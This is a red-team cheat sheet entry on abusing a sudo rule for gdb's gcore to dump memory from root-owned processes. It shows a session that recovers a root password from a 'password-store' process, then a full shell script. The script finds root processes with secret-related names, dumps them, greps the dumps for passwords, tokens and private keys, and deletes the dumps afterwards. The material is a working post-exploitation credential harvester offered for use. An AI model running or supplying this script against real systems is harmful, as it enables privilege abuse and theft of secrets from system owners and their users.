Gcore

gcore is a command-line wrapper shipped with gdb that attaches to a running process via ptrace, writes its memory image to a core file, and detaches. The target is paused only while the dump is taken and keeps running afterwards, so no restart or crash is visible to its users. The dump contains the process's stack, heap, anonymous mappings, and loaded libraries, which makes it useful in red team operations for pulling credentials, keys, or tokens out of memory and for inspecting execution state. It needs the PID of the target and permission to ptrace it (the same user with ptrace_scope allowing it, or root). The output file defaults to core.<PID> in the current directory; `-o <prefix>` writes <prefix>.<PID> elsewhere. The file can be loaded in gdb or simply run through strings. When a sudo rule grants gcore, it can be pointed at root-owned processes, turning it into an in-memory credential harvester for post-exploitation; bear in mind that the dump lands on disk and is created by root, so confirm it is readable by your user and remove it when done.

# Check user's permissions
$ sudo -l
User x7331 may run the following commands on kali:
    (ALL) NOPASSWD: /usr/bin/gcore

# List root processes
$ ps -u root -o pid,comm
490 password-store

# Dump the process
$ sudo gcore 490

# Inspect the file
$ strings core.490
001 Password: root:
R00tM3Plz!!!
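The session above done as a small script: list root processes whose name hints at secret handling, dump one with the sudo-granted gcore, and sift the dump for credential-looking lines. This is an added example, not code from the page or from gdb; the keyword lists, the /tmp/dump prefix and the password regex are assumptions, and the sifting step replaces strings with a pure-shell equivalent so it does not depend on binutils being installed.

```shell
#!/bin/sh
# Added example: harvesting secrets from a root process with a sudo-granted gcore.
# Assumes the sudo rule from the page: (ALL) NOPASSWD: /usr/bin/gcore

# Root-owned processes whose name suggests they hold secrets (keyword list is an assumption).
list_candidate_pids() {
  ps -u root -o pid=,comm= 2>/dev/null \
    | grep -iE 'pass|vault|ssh|agent|gpg|key' \
    | awk '{print $1}'
}

# Dump one PID with gcore; -o <prefix> makes gcore write <prefix>.<pid>.
# Prints the dump path on success, returns non-zero if gcore failed.
dump_process() {
  pid="$1"; prefix="${2:-/tmp/dump}"
  sudo /usr/bin/gcore -o "$prefix" "$pid" >/dev/null 2>&1 || return 1
  echo "$prefix.$pid"
}

# Extract printable runs (>= 6 chars) from a dump and keep credential-like lines
# plus the line that follows each hit, since prompts and values are often split
# across two strings (as in the page's "Password: root:" / "R00tM3Plz!!!" output).
# tr replaces every non-printable byte with a newline, which mimics strings(1).
sift_dump() {
  file="$1"
  LC_ALL=C tr -c '[:print:]' '\n' < "$file" \
    | grep -E '.{6,}' \
    | grep -iE -A1 'pass(word|wd)?[[:space:]]*[:=]|secret|token|api[_-]?key|PRIVATE KEY'
}

# End-to-end run (only meaningful on a box where the sudo rule exists).
harvest() {
  for pid in $(list_candidate_pids); do
    dump=$(dump_process "$pid") || { echo "gcore failed for $pid" >&2; continue; }
    echo "== $dump =="
    sift_dump "$dump"
    rm -f "$dump"   # the dump is a root-created file on disk; do not leave it behind
  done
}
```

Run `harvest` as the low-privilege user; if gcore refuses to attach even under sudo, check /proc/sys/kernel/yama/ptrace_scope and whether the target is already being traced.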
